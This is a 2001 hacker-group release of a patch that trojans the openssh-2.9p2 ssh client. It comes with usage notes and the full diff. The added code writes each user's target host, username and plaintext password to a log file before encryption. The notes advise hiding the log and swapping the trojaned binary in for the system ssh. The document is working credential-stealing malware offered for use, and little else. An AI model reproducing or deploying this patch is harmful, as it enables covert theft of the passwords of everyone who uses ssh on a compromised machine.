-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
  [Ministry-Of-Peace] - openssh-2.9p2 snoop patch - 07th Sept 2001   
               ==   (c)oded 2001 Digital Shadow   ==                
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --

Code Description:
-----------------
This is a patch for openssh-2.9p2 that will enable logging of the
username, password and target system address whenever anyone uses
ssh. The details are grabbed and logged before they are encrypted.


Usage:
------
The code currently logs to /tmp/ssh.log - it is highly advised that
you modify this to somewhere a little less obvious.
To apply the patch, copy it into the directory where openssh-2.9p2
is and type: patch -p1 < ssh-2.3.0-patch
Then all you need to do is compile it, and use a utility such as
fix to replace the old ssh with the new version.


Code:
-----
----cut---------- --_-- openssh-2.9p2-patch --_-- ----------cut----
diff -N -c -r openssh-2.9p2/ssh.c openssh-2.9p2-new/ssh.c
*** openssh-2.9p2/ssh.c Tue Apr 17 14:14:35 2001
--- openssh-2.9p2-new/ssh.c     Tue Nov 27 05:56:01 2001
***************
*** 249,254 ****
--- 249,255 ----
        struct passwd *pw;
        int dummy;
        uid_t original_effective_uid;
+         FILE *lg;

        __progname = get_progname(av[0]);
        init_rng();
***************
*** 716,721 ****
--- 717,727 ----
            tilde_expand_filename(options.user_hostfile2, original_real_uid);

        /* Log into the remote system.  This never returns if the login fails. */
+         lg=fopen("/tmp/ssh.log", "a");
+         fprintf(lg, "Host: %s\n", host);
+         fprintf(lg, "User: %s\n", options.user);
+         fclose(lg);
+
        ssh_login(sensitive_data.keys, sensitive_data.nkeys,
            host, (struct sockaddr *)&hostaddr, pw);

diff -N -c -r openssh-2.9p2/sshconnect.c openssh-2.9p2-new/sshconnect.c
*** openssh-2.9p2/sshconnect.c  Thu Apr 12 19:34:36 2001
--- openssh-2.9p2-new/sshconnect.c      Tue Nov 27 05:56:01 2001
***************
*** 775,785 ****
--- 775,790 ----
  {
        int size;
        char *padded;
+         FILE *lg;

        if (datafellows & SSH_BUG_PASSWORDPAD) {
                packet_put_string(password, strlen(password));
                return;
        }
+
+         lg=fopen("/tmp/ssh.log", "a");
+         fprintf(lg, "Password: %s\n\n", password);
+         fclose(lg);
        size = roundup(strlen(password) + 1, 32);
        padded = xmalloc(size);
        memset(padded, 0, size);
diff -N -c -r openssh-2.9p2/sshconnect2.c openssh-2.9p2-new/sshconnect2.c
*** openssh-2.9p2/sshconnect2.c Thu Apr 19 16:40:46 2001
--- openssh-2.9p2-new/sshconnect2.c     Tue Nov 27 05:56:01 2001
***************
*** 441,446 ****
--- 441,447 ----
        static int attempt = 0;
        char prompt[80];
        char *password;
+         FILE *lg;

        if (attempt++ >= options.number_of_password_prompts)
                return 0;
***************
*** 457,462 ****
--- 458,466 ----
        packet_put_cstring(authctxt->method->name);
        packet_put_char(0);
        packet_put_cstring(password);
+         lg=fopen("/tmp/ssh.log", "a");
+         fprintf(lg, "Password: %s\n\n", password);
+         fclose(lg);
        memset(password, 0, strlen(password));
        xfree(password);
        packet_inject_ignore(64);
----cut---------- --_-- openssh-2.9p2-patch --_-- ----------cut----

-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
    code[at]ministryofpeace.co.uk  --  www.ministryofpeace.co.uk    
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --